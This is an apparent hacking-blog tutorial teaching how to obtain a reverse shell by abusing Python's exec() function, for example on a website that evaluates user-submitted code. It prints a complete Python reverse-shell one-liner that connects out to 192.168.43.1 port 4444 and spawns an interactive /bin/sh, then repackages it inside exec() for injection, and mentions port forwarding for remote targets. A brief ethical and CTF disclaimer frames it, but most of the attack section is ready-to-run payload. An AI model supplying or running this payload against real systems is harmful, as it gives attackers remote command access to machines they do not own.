INTRO

If you have read my last post, I showed you some examples there that how can a Hacker be able to gain a command Shell using the flaw of Website command injection. and in the last lines, I promised you to teach you to gain a shell.

Today’s topic is going to be very interesting. gaining a shell of a machine/OS is the most favourite thing of a Black Hat hacker. But keep that in mind that We are not Black Hat Hackers. it can also be a part of a CTF challenge in which you are participating.

Before starting this tutorial, I would like to suggest you some of my  previous articles to read as revision:

1.Python Command Execution

2. All Kind Of Reverse Shell Explained

3. ICMP Reverse Shell

first and second are important to look before reading more here. the third one is not that necessary but you can take a look if you have the curiosity to hack windows. in the third one, I have explained very well to use the ICMP protocol to get a reverse shell.

 

ATTACK

First of all, I am really sorry. because I forget to tell you one more method of command execution with python. that’s why, in this post, we are covering that up. we will use another method to get the reverse shell. I am using my Kali Linux machine to perform all tasks here.

 

exec(‘print(“HACKED!!!!”)’)  – New Method
exec function is not only in Python but also in PHP, JavaScript,SQL etc. it is used to run its own programming language. I mean to say that you can’t run a system command using this function. but you can run the programme language statements in which you are using the exec function.
For example, I am using python. so a python statement would be like:
print("Hi, i am lucky")

now, if we want to run it in the exec function. we will have to make is a string:

exec('print("Hi, i am lucky")')

run it in python interpreter. and you will see the result yourself. A developer can use this function in many conditions. for example, if he is making a website which tells if the given input is a python code or not. in this case it will run the whole code which is not a good thing if you don’t have some kind of presentation on the website.

 

Reverse-Shell

For executing a reverse shell with the exec function, you will need to make the whole python reverse shell a string. I have already discussed the python reverse shell in my previous articles. I won’t explain it here.

so a python reverse-shell look like this:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.43.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

you can change the IP and PORT as per your need. now we will make it a string so that we can make it an argument for the exec function. now remove the python -c from the reverse shell.and do as shown below:

exec('import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.43.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);')

now that our function is ready, we can run it in python interpreter.

Screenshots:

 

As you can see we have got the connection from one terminal to another. if you want to run it locally, you can assign a local IP. But in case, you are performing such task remotely, you will use port forwarding.

 

Stay home, stay safe and keep reading our articles.

Thanks For Visiting.

RELATED ARTICLESMORE FROM AUTHOR

LEAVE A REPLY

Please enter your comment!
Please enter your name here